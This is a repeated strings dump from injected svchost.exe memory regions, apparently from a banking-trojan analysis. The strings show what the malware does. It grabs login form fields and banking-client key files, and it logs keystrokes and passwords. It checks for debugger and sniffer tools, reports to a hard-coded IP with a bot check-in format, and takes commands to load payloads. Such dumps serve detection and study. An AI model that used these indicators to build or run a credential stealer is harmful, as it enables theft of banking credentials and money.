edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
%s\%s
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
MSVCRT.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
RegDeleteKeyA
ADVAPI32.dll
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
.Prev
.current
1-191j1w1}1
?"?(?-?~?
;-;5;=;^;|;
7"7)7\7~7
6 6$6(6,6064686
mavast.com
ya.ru
serverkey.dat
\windows\

svchost.exe_932_rwx_00F30000_0006A000:




.text
`.rdata
@.data
.reloc
<>http
PSShL
SSShp
tUSSSh
SSShp;
SSSh0 
SSShpk
SSShpF
t9SSSh
u1SSShP
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
C:\iDEFENSE
\\.\NPF_NdisWanIp
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.4.10
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
/search.php
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
%s\%s
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
MSVCRT.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
RegDeleteKeyA
ADVAPI32.dll
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
.Prev
.current
SYSTEM!XP1!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
%System%\config\systemprofile\Application Data\
1-191j1w1}1
?"?(?-?~?
;-;5;=;^;|;
7"7)7\7~7
6 6$6(6,6064686
mavast.com
ya.ru
serverkey.dat
\windows\

svchost.exe_1012_rwx_00B00000_0005B000:




.text
`.data
.reloc
`.rdata
@.data
<>http
PSShL
SSShp
tUSSSh
SSShp;
SSSh0 
SSShpk
SSShpF
t9SSSh
u1SSShP
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
C:\iDEFENSE
\\.\NPF_NdisWanIp
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.4.10
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
/search.php
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
%s\%s
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
MSVCRT.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
RegDeleteKeyA
ADVAPI32.dll
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
.Prev
.current
1-191j1w1}1
?"?(?-?~?
;-;5;=;^;|;
7"7)7\7~7
6 6$6(6,6064686
mavast.com
ya.ru
serverkey.dat
\windows\

svchost.exe_1012_rwx_00BA0000_0006A000:




.text
`.rdata
@.data
.reloc
<>http
PSShL
SSShp
tUSSSh
SSShp;
SSSh0 
SSShpk
SSShpF
t9SSSh
u1SSShP
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
C:\iDEFENSE
\\.\NPF_NdisWanIp
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.4.10
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
/search.php
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
%s\%s
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
MSVCRT.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
RegDeleteKeyA
ADVAPI32.dll
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
.Prev
.current
NETWORKSERVICE!XP1!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\NetworkService\Application Data\
1-191j1w1}1
?"?(?-?~?
;-;5;=;^;|;
7"7)7\7~7
6 6$6(6,6064686
mavast.com
ya.ru
serverkey.dat
\windows\

svchost.exe_1100_rwx_02FE0000_0005B000:




.text
`.data
.reloc
`.rdata
@.data
<>http
PSShL
SSShp
tUSSSh
SSShp;
SSSh0 
SSShpk
SSShpF
t9SSSh
u1SSShP
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
C:\iDEFENSE
\\.\NPF_NdisWanIp
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.4.10
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
/search.php
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
